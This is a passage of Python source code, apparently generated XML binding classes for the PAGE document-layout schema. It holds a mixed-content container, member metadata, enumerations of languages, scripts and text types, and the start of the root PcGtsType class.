    TypeDouble = 6
    TypeBoolean = 7
    TypeBase64 = 8
    def __init__(self, category, content_type, name, value):
        self.category = category
        self.content_type = content_type
        self.name = name
        self.value = value
    def getCategory(self):
        return self.category
    def getContenttype(self, content_type):
        # NOTE(review): the parameter is unused; retained because the
        # generated API is called with it.
        return self.content_type
    def getValue(self):
        return self.value
    def getName(self):
        return self.name
    def export(self, outfile, level, name, namespace,
               pretty_print=True):
        """Write this content item to *outfile* as XML text."""
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                outfile.write(self.value)
        elif self.category == MixedContainer.CategorySimple:
            self.exportSimple(outfile, level, name)
        else:    # category == MixedContainer.CategoryComplex
            self.value.export(
                outfile, level, namespace, name_=name,
                pretty_print=pretty_print)
    def exportSimple(self, outfile, level, name):
        # Pick the %-format matching the declared simple content type.
        if self.content_type == MixedContainer.TypeString:
            outfile.write('<%s>%s</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeInteger or \
                self.content_type == MixedContainer.TypeBoolean:
            outfile.write('<%s>%d</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeFloat or \
                self.content_type == MixedContainer.TypeDecimal:
            outfile.write('<%s>%f</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeDouble:
            outfile.write('<%s>%g</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeBase64:
            outfile.write('<%s>%s</%s>' % (
                self.name,
                base64.b64encode(self.value),
                self.name))
    def to_etree(self, element, mapping_=None, nsmap_=None):
        """Append this content item to lxml *element*."""
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                # Text belongs in the tail of the previous sibling, or
                # in element.text when there is no sibling yet.
                if len(element) > 0:
                    if element[-1].tail is None:
                        element[-1].tail = self.value
                    else:
                        element[-1].tail += self.value
                else:
                    if element.text is None:
                        element.text = self.value
                    else:
                        element.text += self.value
        elif self.category == MixedContainer.CategorySimple:
            subelement = etree_.SubElement(
                element, '%s' % self.name)
            subelement.text = self.to_etree_simple()
        else:    # category == MixedContainer.CategoryComplex
            self.value.to_etree(element)
    def to_etree_simple(self, mapping_=None, nsmap_=None):
        # Text form of a simple value, mirroring exportSimple's formats.
        if self.content_type == MixedContainer.TypeString:
            text = self.value
        elif (self.content_type == MixedContainer.TypeInteger or
                self.content_type == MixedContainer.TypeBoolean):
            text = '%d' % self.value
        elif (self.content_type == MixedContainer.TypeFloat or
                self.content_type == MixedContainer.TypeDecimal):
            text = '%f' % self.value
        elif self.content_type == MixedContainer.TypeDouble:
            text = '%g' % self.value
        elif self.content_type == MixedContainer.TypeBase64:
            text = '%s' % base64.b64encode(self.value)
        return text
    def exportLiteral(self, outfile, level, name):
        """Write this item as a Python literal (constructor call)."""
        if self.category == MixedContainer.CategoryText:
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
                    self.category, self.content_type,
                    self.name, self.value))
        elif self.category == MixedContainer.CategorySimple:
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
                    self.category, self.content_type,
                    self.name, self.value))
        else:    # category == MixedContainer.CategoryComplex
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s",\n' % (
                    self.category, self.content_type, self.name,))
            self.value.exportLiteral(outfile, level + 1)
            showIndent(outfile, level)
            outfile.write(')\n')
class MemberSpec_(object):
    """Metadata describing one member (element or attribute) of a
    generated class: its name, schema data type (or type chain),
    container flag, child attributes, choice group, and optionality."""
    def __init__(self, name='', data_type='', container=0,
                 optional=0, child_attrs=None, choice=None):
        self.name = name
        self.data_type = data_type
        self.container = container
        self.child_attrs = child_attrs
        self.choice = choice
        self.optional = optional
    def set_name(self, name):
        self.name = name
    def get_name(self):
        return self.name
    def set_data_type(self, data_type):
        self.data_type = data_type
    def get_data_type_chain(self):
        return self.data_type
    def get_data_type(self):
        """Return the effective data type: the last entry of a type
        chain, 'xs:string' for an empty chain, or the scalar value."""
        chain = self.data_type
        if not isinstance(chain, list):
            return chain
        return chain[-1] if chain else 'xs:string'
    def set_container(self, container):
        self.container = container
    def get_container(self):
        return self.container
    def set_child_attrs(self, child_attrs):
        self.child_attrs = child_attrs
    def get_child_attrs(self):
        return self.child_attrs
    def set_choice(self, choice):
        self.choice = choice
    def get_choice(self):
        return self.choice
    def set_optional(self, optional):
        self.optional = optional
    def get_optional(self):
        return self.optional
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class AlignSimpleType(str, Enum):
    """Horizontal alignment values."""
    LEFT='left'
    CENTRE='centre'
    RIGHT='right'
    JUSTIFY='justify'
class ChartTypeSimpleType(str, Enum):
    """Kinds of chart depicted in a chart region."""
    BAR='bar'
    LINE='line'
    PIE='pie'
    SCATTER='scatter'
    SURFACE='surface'
    OTHER='other'
class ColourDepthSimpleType(str, Enum):
    """Colour depth of an image (bilevel, greyscale, colour)."""
    BILEVEL='bilevel'
    GREYSCALE='greyscale'
    COLOUR='colour'
    OTHER='other'
class ColourSimpleType(str, Enum):
    """Named colour values."""
    BLACK='black'
    BLUE='blue'
    BROWN='brown'
    CYAN='cyan'
    GREEN='green'
    GREY='grey'
    INDIGO='indigo'
    MAGENTA='magenta'
    ORANGE='orange'
    PINK='pink'
    RED='red'
    TURQUOISE='turquoise'
    VIOLET='violet'
    WHITE='white'
    YELLOW='yellow'
    OTHER='other'
class GraphicsTypeSimpleType(str, Enum):
    """Kinds of graphical page element."""
    LOGO='logo'
    LETTERHEAD='letterhead'
    DECORATION='decoration'
    FRAME='frame'
    HANDWRITTENANNOTATION='handwritten-annotation'
    STAMP='stamp'
    SIGNATURE='signature'
    BARCODE='barcode'
    PAPERGROW='paper-grow'
    PUNCHHOLE='punch-hole'
    OTHER='other'
class GroupTypeSimpleType(str, Enum):
    """Logical group types."""
    PARAGRAPH='paragraph'
    LIST='list'
    LISTITEM='list-item'
    FIGURE='figure'
    ARTICLE='article'
    DIV='div'
    OTHER='other'
class LanguageSimpleType(str, Enum):
    """Language names (ISO 639.x, as of 2016-07-14)."""
    ABKHAZ='Abkhaz'
    AFAR='Afar'
    AFRIKAANS='Afrikaans'
    AKAN='Akan'
    ALBANIAN='Albanian'
    AMHARIC='Amharic'
    ARABIC='Arabic'
    ARAGONESE='Aragonese'
    ARMENIAN='Armenian'
    ASSAMESE='Assamese'
    AVARIC='Avaric'
    AVESTAN='Avestan'
    AYMARA='Aymara'
    AZERBAIJANI='Azerbaijani'
    BAMBARA='Bambara'
    BASHKIR='Bashkir'
    BASQUE='Basque'
    BELARUSIAN='Belarusian'
    BENGALI='Bengali'
    BIHARI='Bihari'
    BISLAMA='Bislama'
    BOSNIAN='Bosnian'
    BRETON='Breton'
    BULGARIAN='Bulgarian'
    BURMESE='Burmese'
    CAMBODIAN='Cambodian'
    CANTONESE='Cantonese'
    CATALAN='Catalan'
    CHAMORRO='Chamorro'
    CHECHEN='Chechen'
    CHICHEWA='Chichewa'
    CHINESE='Chinese'
    CHUVASH='Chuvash'
    CORNISH='Cornish'
    CORSICAN='Corsican'
    CREE='Cree'
    CROATIAN='Croatian'
    CZECH='Czech'
    DANISH='Danish'
    DIVEHI='Divehi'
    DUTCH='Dutch'
    DZONGKHA='Dzongkha'
    ENGLISH='English'
    ESPERANTO='Esperanto'
    ESTONIAN='Estonian'
    EWE='Ewe'
    FAROESE='Faroese'
    FIJIAN='Fijian'
    FINNISH='Finnish'
    FRENCH='French'
    FULA='Fula'
    GAELIC='Gaelic'
    GALICIAN='Galician'
    GANDA='Ganda'
    GEORGIAN='Georgian'
    GERMAN='German'
    GREEK='Greek'
    GUARANÍ='Guaraní'
    GUJARATI='Gujarati'
    HAITIAN='Haitian'
    HAUSA='Hausa'
    HEBREW='Hebrew'
    HERERO='Herero'
    HINDI='Hindi'
    HIRI_MOTU='Hiri Motu'
    HUNGARIAN='Hungarian'
    ICELANDIC='Icelandic'
    IDO='Ido'
    IGBO='Igbo'
    INDONESIAN='Indonesian'
    INTERLINGUA='Interlingua'
    INTERLINGUE='Interlingue'
    INUKTITUT='Inuktitut'
    INUPIAQ='Inupiaq'
    IRISH='Irish'
    ITALIAN='Italian'
    JAPANESE='Japanese'
    JAVANESE='Javanese'
    KALAALLISUT='Kalaallisut'
    KANNADA='Kannada'
    KANURI='Kanuri'
    KASHMIRI='Kashmiri'
    KAZAKH='Kazakh'
    KHMER='Khmer'
    KIKUYU='Kikuyu'
    KINYARWANDA='Kinyarwanda'
    KIRUNDI='Kirundi'
    KOMI='Komi'
    KONGO='Kongo'
    KOREAN='Korean'
    KURDISH='Kurdish'
    KWANYAMA='Kwanyama'
    KYRGYZ='Kyrgyz'
    LAO='Lao'
    LATIN='Latin'
    LATVIAN='Latvian'
    LIMBURGISH='Limburgish'
    LINGALA='Lingala'
    LITHUANIAN='Lithuanian'
    LUBA_KATANGA='Luba-Katanga'
    LUXEMBOURGISH='Luxembourgish'
    MACEDONIAN='Macedonian'
    MALAGASY='Malagasy'
    MALAY='Malay'
    MALAYALAM='Malayalam'
    MALTESE='Maltese'
    MANX='Manx'
    MĀORI='Māori'
    MARATHI='Marathi'
    MARSHALLESE='Marshallese'
    MONGOLIAN='Mongolian'
    NAURU='Nauru'
    NAVAJO='Navajo'
    NDONGA='Ndonga'
    NEPALI='Nepali'
    NORTH_NDEBELE='North Ndebele'
    NORTHERN_SAMI='Northern Sami'
    NORWEGIAN='Norwegian'
    NORWEGIAN_BOKMÅL='Norwegian Bokmål'
    NORWEGIAN_NYNORSK='Norwegian Nynorsk'
    NUOSU='Nuosu'
    OCCITAN='Occitan'
    OJIBWE='Ojibwe'
    OLD_CHURCH_SLAVONIC='Old Church Slavonic'
    ORIYA='Oriya'
    OROMO='Oromo'
    OSSETIAN='Ossetian'
    PĀLI='Pāli'
    PANJABI='Panjabi'
    PASHTO='Pashto'
    PERSIAN='Persian'
    POLISH='Polish'
    PORTUGUESE='Portuguese'
    PUNJABI='Punjabi'
    QUECHUA='Quechua'
    ROMANIAN='Romanian'
    ROMANSH='Romansh'
    RUSSIAN='Russian'
    SAMOAN='Samoan'
    SANGO='Sango'
    SANSKRIT='Sanskrit'
    SARDINIAN='Sardinian'
    SERBIAN='Serbian'
    SHONA='Shona'
    SINDHI='Sindhi'
    SINHALA='Sinhala'
    SLOVAK='Slovak'
    SLOVENE='Slovene'
    SOMALI='Somali'
    SOUTH_NDEBELE='South Ndebele'
    SOUTHERN_SOTHO='Southern Sotho'
    SPANISH='Spanish'
    SUNDANESE='Sundanese'
    SWAHILI='Swahili'
    SWATI='Swati'
    SWEDISH='Swedish'
    TAGALOG='Tagalog'
    TAHITIAN='Tahitian'
    TAJIK='Tajik'
    TAMIL='Tamil'
    TATAR='Tatar'
    TELUGU='Telugu'
    THAI='Thai'
    TIBETAN='Tibetan'
    TIGRINYA='Tigrinya'
    TONGA='Tonga'
    TSONGA='Tsonga'
    TSWANA='Tswana'
    TURKISH='Turkish'
    TURKMEN='Turkmen'
    TWI='Twi'
    UIGHUR='Uighur'
    UKRAINIAN='Ukrainian'
    URDU='Urdu'
    UZBEK='Uzbek'
    VENDA='Venda'
    VIETNAMESE='Vietnamese'
    VOLAPÜK='Volapük'
    WALLOON='Walloon'
    WELSH='Welsh'
    WESTERN_FRISIAN='Western Frisian'
    WOLOF='Wolof'
    XHOSA='Xhosa'
    YIDDISH='Yiddish'
    YORUBA='Yoruba'
    ZHUANG='Zhuang'
    ZULU='Zulu'
    OTHER='other'
class PageTypeSimpleType(str, Enum):
    """Role of a page within a document."""
    FRONTCOVER='front-cover'
    BACKCOVER='back-cover'
    TITLE='title'
    TABLEOFCONTENTS='table-of-contents'
    INDEX='index'
    CONTENT='content'
    BLANK='blank'
    OTHER='other'
class ProductionSimpleType(str, Enum):
    """Text production type (how the text was produced)."""
    PRINTED='printed'
    TYPEWRITTEN='typewritten'
    HANDWRITTENCURSIVE='handwritten-cursive'
    HANDWRITTENPRINTSCRIPT='handwritten-printscript'
    MEDIEVALMANUSCRIPT='medieval-manuscript'
    OTHER='other'
class ReadingDirectionSimpleType(str, Enum):
    """Text reading direction values."""
    LEFTTORIGHT='left-to-right'
    RIGHTTOLEFT='right-to-left'
    TOPTOBOTTOM='top-to-bottom'
    BOTTOMTOTOP='bottom-to-top'
class ScriptSimpleType(str, Enum):
    """Writing scripts (ISO 15924 codes and names, as of 2016-07-14)."""
    ADLM_ADLAM='Adlm - Adlam'
    AFAK_AFAKA='Afak - Afaka'
    AGHB_CAUCASIAN_ALBANIAN='Aghb - Caucasian Albanian'
    AHOM_AHOM_TAI_AHOM='Ahom - Ahom, Tai Ahom'
    ARAB_ARABIC='Arab - Arabic'
    ARAN_ARABIC_NASTALIQVARIANT='Aran - Arabic (Nastaliq variant)'
    ARMI_IMPERIAL_ARAMAIC='Armi - Imperial Aramaic'
    ARMN_ARMENIAN='Armn - Armenian'
    AVST_AVESTAN='Avst - Avestan'
    BALI_BALINESE='Bali - Balinese'
    BAMU_BAMUM='Bamu - Bamum'
    BASS_BASSA_VAH='Bass - Bassa Vah'
    BATK_BATAK='Batk - Batak'
    BENG_BENGALI='Beng - Bengali'
    BHKS_BHAIKSUKI='Bhks - Bhaiksuki'
    BLIS_BLISSYMBOLS='Blis - Blissymbols'
    BOPO_BOPOMOFO='Bopo - Bopomofo'
    BRAH_BRAHMI='Brah - Brahmi'
    BRAI_BRAILLE='Brai - Braille'
    BUGI_BUGINESE='Bugi - Buginese'
    BUHD_BUHID='Buhd - Buhid'
    CAKM_CHAKMA='Cakm - Chakma'
    CANS_UNIFIED_CANADIAN_ABORIGINAL_SYLLABICS='Cans - Unified Canadian Aboriginal Syllabics'
    CARI_CARIAN='Cari - Carian'
    CHAM_CHAM='Cham - Cham'
    CHER_CHEROKEE='Cher - Cherokee'
    CIRT_CIRTH='Cirt - Cirth'
    COPT_COPTIC='Copt - Coptic'
    CPRT_CYPRIOT='Cprt - Cypriot'
    CYRL_CYRILLIC='Cyrl - Cyrillic'
    CYRS_CYRILLIC_OLD_CHURCH_SLAVONICVARIANT='Cyrs - Cyrillic (Old Church Slavonic variant)'
    DEVA_DEVANAGARI_NAGARI='Deva - Devanagari (Nagari)'
    DSRT_DESERET_MORMON='Dsrt - Deseret (Mormon)'
    DUPL_DUPLOYANSHORTHAND_DUPLOYANSTENOGRAPHY='Dupl - Duployan shorthand, Duployan stenography'
    EGYD_EGYPTIANDEMOTIC='Egyd - Egyptian demotic'
    EGYH_EGYPTIANHIERATIC='Egyh - Egyptian hieratic'
    EGYP_EGYPTIANHIEROGLYPHS='Egyp - Egyptian hieroglyphs'
    ELBA_ELBASAN='Elba - Elbasan'
    ETHI_ETHIOPIC='Ethi - Ethiopic'
    GEOK_KHUTSURI_ASOMTAVRULIAND_NUSKHURI='Geok - Khutsuri (Asomtavruli and Nuskhuri)'
    GEOR_GEORGIAN_MKHEDRULI='Geor - Georgian (Mkhedruli)'
    GLAG_GLAGOLITIC='Glag - Glagolitic'
    GOTH_GOTHIC='Goth - Gothic'
    GRAN_GRANTHA='Gran - Grantha'
    GREK_GREEK='Grek - Greek'
    GUJR_GUJARATI='Gujr - Gujarati'
    GURU_GURMUKHI='Guru - Gurmukhi'
    HANB_HANWITH_BOPOMOFO='Hanb - Han with Bopomofo'
    HANG_HANGUL='Hang - Hangul'
    HANI_HAN_HANZI_KANJI_HANJA='Hani - Han (Hanzi, Kanji, Hanja)'
    HANO_HANUNOO_HANUNÓO='Hano - Hanunoo (Hanunóo)'
    HANS_HAN_SIMPLIFIEDVARIANT='Hans - Han (Simplified variant)'
    HANT_HAN_TRADITIONALVARIANT='Hant - Han (Traditional variant)'
    HATR_HATRAN='Hatr - Hatran'
    HEBR_HEBREW='Hebr - Hebrew'
    HIRA_HIRAGANA='Hira - Hiragana'
    HLUW_ANATOLIAN_HIEROGLYPHS='Hluw - Anatolian Hieroglyphs'
    HMNG_PAHAWH_HMONG='Hmng - Pahawh Hmong'
    HRKT_JAPANESESYLLABARIES='Hrkt - Japanese syllabaries'
    HUNG_OLD_HUNGARIAN_HUNGARIAN_RUNIC='Hung - Old Hungarian (Hungarian Runic)'
    INDS_INDUS_HARAPPAN='Inds - Indus (Harappan)'
    ITAL_OLD_ITALIC_ETRUSCAN_OSCANETC='Ital - Old Italic (Etruscan, Oscan etc.)'
    JAMO_JAMO='Jamo - Jamo'
    JAVA_JAVANESE='Java - Javanese'
    JPAN_JAPANESE='Jpan - Japanese'
    JURC_JURCHEN='Jurc - Jurchen'
    KALI_KAYAH_LI='Kali - Kayah Li'
    KANA_KATAKANA='Kana - Katakana'
    KHAR_KHAROSHTHI='Khar - Kharoshthi'
    KHMR_KHMER='Khmr - Khmer'
    KHOJ_KHOJKI='Khoj - Khojki'
    KITL_KHITANLARGESCRIPT='Kitl - Khitan large script'
    KITS_KHITANSMALLSCRIPT='Kits - Khitan small script'
    KNDA_KANNADA='Knda - Kannada'
    KORE_KOREANALIASFOR_HANGUL_HAN='Kore - Korean (alias for Hangul + Han)'
    KPEL_KPELLE='Kpel - Kpelle'
    KTHI_KAITHI='Kthi - Kaithi'
    LANA_TAI_THAM_LANNA='Lana - Tai Tham (Lanna)'
    LAOO_LAO='Laoo - Lao'
    LATF_LATIN_FRAKTURVARIANT='Latf - Latin (Fraktur variant)'
    LATG_LATIN_GAELICVARIANT='Latg - Latin (Gaelic variant)'
    LATN_LATIN='Latn - Latin'
    LEKE_LEKE='Leke - Leke'
    LEPC_LEPCHARÓNG='Lepc - Lepcha (Róng)'
    LIMB_LIMBU='Limb - Limbu'
    LINA_LINEARA='Lina - Linear A'
    LINB_LINEARB='Linb - Linear B'
    LISU_LISU_FRASER='Lisu - Lisu (Fraser)'
    LOMA_LOMA='Loma - Loma'
    LYCI_LYCIAN='Lyci - Lycian'
    LYDI_LYDIAN='Lydi - Lydian'
    MAHJ_MAHAJANI='Mahj - Mahajani'
    MAND_MANDAIC_MANDAEAN='Mand - Mandaic, Mandaean'
    MANI_MANICHAEAN='Mani - Manichaean'
    MARC_MARCHEN='Marc - Marchen'
    MAYA_MAYANHIEROGLYPHS='Maya - Mayan hieroglyphs'
    MEND_MENDE_KIKAKUI='Mend - Mende Kikakui'
    MERC_MEROITIC_CURSIVE='Merc - Meroitic Cursive'
    MERO_MEROITIC_HIEROGLYPHS='Mero - Meroitic Hieroglyphs'
    MLYM_MALAYALAM='Mlym - Malayalam'
    MODI_MODI_MOḌĪ='Modi - Modi, Moḍī'
    MONG_MONGOLIAN='Mong - Mongolian'
    MOON_MOON_MOONCODE_MOONSCRIPT_MOONTYPE='Moon - Moon (Moon code, Moon script, Moon type)'
    MROO_MRO_MRU='Mroo - Mro, Mru'
    MTEI_MEITEI_MAYEK_MEITHEI_MEETEI='Mtei - Meitei Mayek (Meithei, Meetei)'
    MULT_MULTANI='Mult - Multani'
    MYMR_MYANMAR_BURMESE='Mymr - Myanmar (Burmese)'
    NARB_OLD_NORTH_ARABIAN_ANCIENT_NORTH_ARABIAN='Narb - Old North Arabian (Ancient North Arabian)'
    NBAT_NABATAEAN='Nbat - Nabataean'
    NEWA_NEWA_NEWAR_NEWARI='Newa - Newa, Newar, Newari'
    NKGB_NAKHI_GEBA='Nkgb - Nakhi Geba'
    NKOON_KO='Nkoo - N’Ko'
    NSHUNÜSHU='Nshu - Nüshu'
    OGAM_OGHAM='Ogam - Ogham'
    OLCK_OL_CHIKI_OL_CEMET_OL_SANTALI='Olck - Ol Chiki (Ol Cemet’, Ol, Santali)'
    ORKH_OLD_TURKIC_ORKHON_RUNIC='Orkh - Old Turkic, Orkhon Runic'
    ORYA_ORIYA='Orya - Oriya'
    OSGE_OSAGE='Osge - Osage'
    OSMA_OSMANYA='Osma - Osmanya'
    PALM_PALMYRENE='Palm - Palmyrene'
    PAUC_PAU_CIN_HAU='Pauc - Pau Cin Hau'
    PERM_OLD_PERMIC='Perm - Old Permic'
    PHAG_PHAGSPA='Phag - Phags-pa'
    PHLI_INSCRIPTIONAL_PAHLAVI='Phli - Inscriptional Pahlavi'
    PHLP_PSALTER_PAHLAVI='Phlp - Psalter Pahlavi'
    PHLV_BOOK_PAHLAVI='Phlv - Book Pahlavi'
    PHNX_PHOENICIAN='Phnx - Phoenician'
    PIQD_KLINGONKLIP_IQA_D='Piqd - Klingon (KLI pIqaD)'
    PLRD_MIAO_POLLARD='Plrd - Miao (Pollard)'
    PRTI_INSCRIPTIONAL_PARTHIAN='Prti - Inscriptional Parthian'
    RJNG_REJANG_REDJANG_KAGANGA='Rjng - Rejang (Redjang, Kaganga)'
    RORO_RONGORONGO='Roro - Rongorongo'
    RUNR_RUNIC='Runr - Runic'
    SAMR_SAMARITAN='Samr - Samaritan'
    SARA_SARATI='Sara - Sarati'
    SARB_OLD_SOUTH_ARABIAN='Sarb - Old South Arabian'
    SAUR_SAURASHTRA='Saur - Saurashtra'
    SGNW_SIGN_WRITING='Sgnw - SignWriting'
    SHAW_SHAVIAN_SHAW='Shaw - Shavian (Shaw)'
    SHRD_SHARADAŚĀRADĀ='Shrd - Sharada, Śāradā'
    SIDD_SIDDHAM='Sidd - Siddham'
    SIND_KHUDAWADI_SINDHI='Sind - Khudawadi, Sindhi'
    SINH_SINHALA='Sinh - Sinhala'
    SORA_SORA_SOMPENG='Sora - Sora Sompeng'
    SUND_SUNDANESE='Sund - Sundanese'
    SYLO_SYLOTI_NAGRI='Sylo - Syloti Nagri'
    SYRC_SYRIAC='Syrc - Syriac'
    SYRE_SYRIAC_ESTRANGELOVARIANT='Syre - Syriac (Estrangelo variant)'
    SYRJ_SYRIAC_WESTERNVARIANT='Syrj - Syriac (Western variant)'
    SYRN_SYRIAC_EASTERNVARIANT='Syrn - Syriac (Eastern variant)'
    TAGB_TAGBANWA='Tagb - Tagbanwa'
    TAKR_TAKRI='Takr - Takri'
    TALE_TAI_LE='Tale - Tai Le'
    TALU_NEW_TAI_LUE='Talu - New Tai Lue'
    TAML_TAMIL='Taml - Tamil'
    TANG_TANGUT='Tang - Tangut'
    TAVT_TAI_VIET='Tavt - Tai Viet'
    TELU_TELUGU='Telu - Telugu'
    TENG_TENGWAR='Teng - Tengwar'
    TFNG_TIFINAGH_BERBER='Tfng - Tifinagh (Berber)'
    TGLG_TAGALOG_BAYBAYIN_ALIBATA='Tglg - Tagalog (Baybayin, Alibata)'
    THAA_THAANA='Thaa - Thaana'
    THAI_THAI='Thai - Thai'
    TIBT_TIBETAN='Tibt - Tibetan'
    TIRH_TIRHUTA='Tirh - Tirhuta'
    UGAR_UGARITIC='Ugar - Ugaritic'
    VAII_VAI='Vaii - Vai'
    VISP_VISIBLE_SPEECH='Visp - Visible Speech'
    WARA_WARANG_CITI_VARANG_KSHITI='Wara - Warang Citi (Varang Kshiti)'
    WOLE_WOLEAI='Wole - Woleai'
    XPEO_OLD_PERSIAN='Xpeo - Old Persian'
    XSUX_CUNEIFORM_SUMERO_AKKADIAN='Xsux - Cuneiform, Sumero-Akkadian'
    YIII_YI='Yiii - Yi'
    ZINH_CODEFORINHERITEDSCRIPT='Zinh - Code for inherited script'
    ZMTH_MATHEMATICALNOTATION='Zmth - Mathematical notation'
    ZSYE_SYMBOLS_EMOJIVARIANT='Zsye - Symbols (Emoji variant)'
    ZSYM_SYMBOLS='Zsym - Symbols'
    ZXXX_CODEFORUNWRITTENDOCUMENTS='Zxxx - Code for unwritten documents'
    ZYYY_CODEFORUNDETERMINEDSCRIPT='Zyyy - Code for undetermined script'
    ZZZZ_CODEFORUNCODEDSCRIPT='Zzzz - Code for uncoded script'
    OTHER='other'
class TextDataTypeSimpleType(str, Enum):
    """XSD data type of a text element's content (PAGE ``dataType`` attribute)."""
    XSDDECIMAL = "xsd:decimal"  # e.g. "123.456", "+1234.456", "-.456", "-456"
    XSDFLOAT = "xsd:float"  # e.g. "123.456", "-1.2344e56", "-.45E-6", "INF", "NaN"
    XSDINTEGER = "xsd:integer"  # e.g. "123456", "+00000012", "-1", "-456"
    XSDBOOLEAN = "xsd:boolean"  # e.g. "true", "false", "1", "0"
    XSDDATE = "xsd:date"  # e.g. "2001-10-26", "2001-10-26+02:00", "2001-10-26Z"
    XSDTIME = "xsd:time"  # e.g. "21:32:52", "21:32:52+02:00", "19:32:52Z"
    XSDDATE_TIME = "xsd:dateTime"  # e.g. "2001-10-26T21:32:52", "...T19:32:52Z"
    XSDSTRING = "xsd:string"  # generic text string
    OTHER = "other"  # unlisted or custom XSD type (see dataTypeDetails attribute)
class TextLineOrderSimpleType(str, Enum):
    """Order in which text lines are stacked within a region."""
    TOPTOBOTTOM = "top-to-bottom"
    BOTTOMTOTOP = "bottom-to-top"
    LEFTTORIGHT = "left-to-right"
    RIGHTTOLEFT = "right-to-left"
class TextTypeSimpleType(str, Enum):
    """Semantic role of a text region (paragraph, heading, footnote, ...)."""
    PARAGRAPH = "paragraph"
    HEADING = "heading"
    CAPTION = "caption"
    HEADER = "header"
    FOOTER = "footer"
    PAGENUMBER = "page-number"
    DROPCAPITAL = "drop-capital"
    CREDIT = "credit"
    FLOATING = "floating"
    SIGNATUREMARK = "signature-mark"
    CATCHWORD = "catch-word"
    MARGINALIA = "marginalia"
    FOOTNOTE = "footnote"
    FOOTNOTECONTINUED = "footnote-continued"
    ENDNOTE = "endnote"
    TOCENTRY = "TOC-entry"
    LISTLABEL = "list-label"
    OTHER = "other"
class UnderlineStyleSimpleType(str, Enum):
    """Style of an underline text decoration."""
    SINGLE_LINE = "singleLine"
    DOUBLE_LINE = "doubleLine"
    OTHER = "other"
class charTypeType(str, Enum):
    """Kind of character represented by a grapheme, group, or
    non-printing character element (base vs. combining)."""
    BASE = "base"
    COMBINING = "combining"
class imageResolutionUnitType(str, Enum):
    """Unit of the image resolution information: a standardised unit of
    measurement (pixels per inch, pixels per centimetre, or other)."""
    PPI = "PPI"
    PPCM = "PPCM"
    OTHER = "other"
class typeType(str, Enum):
    """Kind of a metadata item (e.g. author, image properties)."""
    AUTHOR = "author"
    IMAGE_PROPERTIES = "imageProperties"
    PROCESSING_STEP = "processingStep"
    OTHER = "other"
class typeType1(str, Enum):
    """Kind of a relation between regions: a loose link or a hard join."""
    LINK = "link"
    JOIN = "join"
class typeType3(str, Enum):
    """XSD value type of a user-defined attribute."""
    XSDSTRING = "xsd:string"
    XSDINTEGER = "xsd:integer"
    XSDBOOLEAN = "xsd:boolean"
    XSDFLOAT = "xsd:float"
class PcGtsType(GeneratedsSuper):
    """Root element type of a PAGE XML document.

    Holds exactly one ``Metadata`` child, one ``Page`` child and the
    optional ``pcGtsId`` attribute.  Generated (generateDS-style) binding
    class: ``build``/``buildChildren`` populate the object from an
    ElementTree node, ``export``/``exportChildren`` serialise it back to
    XML, and ``factory`` supports registered subclass substitution.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema introspection table: one MemberSpec_ per attribute / child
    # element (name, XSD type, container flag, optionality, schema info).
    member_data_items_ = [
        MemberSpec_('pcGtsId', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('Metadata', 'MetadataType', 0, 0, {'name': 'Metadata', 'type': 'MetadataType'}, None),
        MemberSpec_('Page', 'PageType', 0, 0, {'name': 'Page', 'type': 'PageType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, pcGtsId=None, Metadata=None, Page=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        self.pcGtsId = _cast(None, pcGtsId)
        self.pcGtsId_nsprefix_ = None
        self.Metadata = Metadata
        self.Metadata_nsprefix_ = "pc"
        self.Page = Page
        self.Page_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        """Create an instance, delegating to a registered subclass if any."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, PcGtsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if PcGtsType.subclass:
            return PcGtsType.subclass(*args_, **kwargs_)
        else:
            return PcGtsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Metadata(self):
        return self.Metadata
    def set_Metadata(self, Metadata):
        self.Metadata = Metadata
    def get_Page(self):
        return self.Page
    def set_Page(self, Page):
        self.Page = Page
    def get_pcGtsId(self):
        return self.pcGtsId
    def set_pcGtsId(self, pcGtsId):
        self.pcGtsId = pcGtsId
    def hasContent_(self):
        # True when at least one child element is present (controls whether
        # export() writes an open/close pair or a self-closing tag).
        if (
            self.Metadata is not None or
            self.Page is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='PcGtsType', pretty_print=True):
        """Write this element (attributes and children) as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('PcGtsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'PcGtsType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
